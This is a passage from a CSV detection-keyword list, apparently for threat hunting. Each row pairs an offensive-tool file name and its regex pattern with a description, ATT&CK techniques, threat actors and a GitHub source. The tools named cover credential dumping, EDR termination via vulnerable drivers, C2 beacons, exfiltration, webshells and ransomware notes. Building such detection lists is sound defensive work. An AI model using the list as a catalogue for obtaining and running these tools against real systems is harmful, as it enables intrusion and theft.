TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","14222" "*\BadRentdrv2.cpp*",".{0,1000}\\BadRentdrv2\.cpp.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","0","N/A","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","14223" "*\BadWindowsService.cs*",".{0,1000}\\BadWindowsService\.cs.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","14224" "*\BadWindowsService.exe*",".{0,1000}\\BadWindowsService\.exe.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","14225" "*\BadWindowsService.sln*",".{0,1000}\\BadWindowsService\.sln.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","14226" "*\BadZure*",".{0,1000}\\BadZure.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the 
setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/mvelazc0/BadZure/","1","0","N/A","N/A","5","5","451","26","2025-04-10T03:20:03Z","2023-05-05T04:52:21Z","14227" "*\barnofoo\pipe\spoolss*",".{0,1000}\\barnofoo\\pipe\\spoolss.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#namedpipe","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","14228" "*\Barrel.exe debugproc*",".{0,1000}\\Barrel\.exe\sdebugproc.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","14229" "*\Base64ToBin.py*",".{0,1000}\\Base64ToBin\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","14230" "*\basicKitten.exe*",".{0,1000}\\basicKitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. 
It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","14232" "*\bat_b4tm4n.php*",".{0,1000}\\bat_b4tm4n\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14275" "*\BB_Readme.txt*",".{0,1000}\\BB_Readme\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14279" "*\BB_Readme2.txt*",".{0,1000}\\BB_Readme2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14280" "*\beacon.exe*",".{0,1000}\\beacon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","14281" "*\BeaconChannel.cs*",".{0,1000}\\BeaconChannel\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","14282" "*\BeaconConnector.cs*",".{0,1000}\\BeaconConnector\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","14283" "*\beacon-in-go.exe*",".{0,1000}\\beacon\-in\-go\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","14284" "*\beacon-obf.exe*",".{0,1000}\\beacon\-obf\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","14285" "*\beRoot.exe*",".{0,1000}\\beRoot\.exe.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","14287" "*\beRoot.zip*",".{0,1000}\\BeRoot.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","14288" "*\beroot\modules\*.py*",".{0,1000}\\beroot\\modules\\.{0,1000}\.py.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","14289" "*\BesoToken.cpp*",".{0,1000}\\BesoToken\.cpp.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","14290" "*\BesoToken.exe*",".{0,1000}\\BesoToken\.exe.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","14291" "*\BesoToken.vcxproj*",".{0,1000}\\BesoToken\.vcxproj.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including 
non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","14292" "*\BetterSafetyKatz.exe*",".{0,1000}\\BetterSafetyKatz\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","14294" "*\BetterSafetyKatz.exe*",".{0,1000}\\BetterSafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","14295" "*\bgp_exfil.py*",".{0,1000}\\bgp_exfil\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","14296" "*\bh_owned.py*",".{0,1000}\\bh_owned\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps 
automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","14297" "*\BHF Rat v * beta.exe*",".{0,1000}\\BHF\sRat\sv\s.{0,1000}\sbeta\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14298" "*\bidon_readme.txt*",".{0,1000}\\bidon_readme\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14299" "*\Bifrost RAT Of Evil.exe*",".{0,1000}\\Bifrost\sRAT\sOf\sEvil\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14300" "*\big_shell_pwd.7z*",".{0,1000}\\big_shell_pwd\.7z.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/shmilylty/cheetah","1","0","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","14301" "*\biglock.txt*",".{0,1000}\\biglock\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14302" "*\bin\cme.exe*",".{0,1000}\\bin\\cme\.exe.{0,1000}","offensive_tool_keyword","crackmapexec","Windows default compiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","14304" "*\bin\HostX64\x64\c2.dll*",".{0,1000}\\bin\\HostX64\\x64\\c2\.dll.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer is malware that steals credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#content","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","14305" 
"*\bin\Release\SchTask.exe*",".{0,1000}\\bin\\Release\\SchTask\.exe.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","14307" "*\bin\shepard\*",".{0,1000}\\bin\\shepard\\.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","14308" "*\bin\uactoken.x86.o*",".{0,1000}\\bin\\uactoken\.x86\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","14310" "*\bin\uactoken2.x64.o*",".{0,1000}\\bin\\uactoken2\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","14311" "*\bin\wmiexec.x64.o*",".{0,1000}\\bin\\wmiexec\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","14312" "*\bin2hex.lua*",".{0,1000}\\bin2hex\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive 
Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","14313" "*\BindShell.exe*",".{0,1000}\\BindShell\.exe.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","14314" "*\bindshell.lua*",".{0,1000}\\bindshell\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","14315" "*\BITB-main*",".{0,1000}\\BITB\-main.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","N/A","10","10","2823","474","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z","14316" "*\bitdefender\getCredsbitdefender.h*",".{0,1000}\\bitdefender\\getCredsbitdefender\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential 
Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","14317" "*\bitdefender\getCredsbitdefender2.h*",".{0,1000}\\bitdefender\\getCredsbitdefender2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","14318" "*\bitpaymer_v1.txt*",".{0,1000}\\bitpaymer_v1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14320" "*\bitpaymer_v2.txt*",".{0,1000}\\bitpaymer_v2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14321" "*\bitransomware.txt*",".{0,1000}\\bitransomware\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14322" "*\BITSInject.py*",".{0,1000}\\BITSInject\.py.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","0","N/A","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","14323" "*\BITSInject-master*",".{0,1000}\\BITSInject\-master.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","0","N/A","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","14324" "*\BITSJobPayloads.py*",".{0,1000}\\BITSJobPayloads\.py.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","0","N/A","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","14325" "*\bitwarden\plugin\getCredsbitwardenPluginChrome.h*",".{0,1000}\\bitwarden\\plugin\\getCredsbitwardenPluginChrome\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","14327" "*\bitwarden\plugin\getCredsbitwardenPluginChrome2.h*",".{0,1000}\\bitwarden\\plugin\\getCredsbitwardenPluginChrome2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential 
Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","14328" "*\blackbasta1.txt*",".{0,1000}\\blackbasta1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14329" "*\blackbasta2.txt*",".{0,1000}\\blackbasta2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14330" "*\blackbasta3.txt*",".{0,1000}\\blackbasta3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14331" "*\blackbasta4.txt*",".{0,1000}\\blackbasta4\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14332" "*\blackbyte_v2.txt*",".{0,1000}\\blackbyte_v2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14333" "*\Black-key 
Spoofer.exe*",".{0,1000}\\Black\-key\sSpoofer\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14334" "*\Blackout.cpp*",".{0,1000}\\Blackout\.cpp.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","14335" "*\Blackout.exe*",".{0,1000}\\Blackout\.exe.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","14336" "*\Blackout.sln*",".{0,1000}\\Blackout\.sln.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","14337" "*\Blackout.sys*",".{0,1000}\\Blackout\.sys.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","14338" "*\Blackout.sys*",".{0,1000}\\Blackout\.sys.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that 
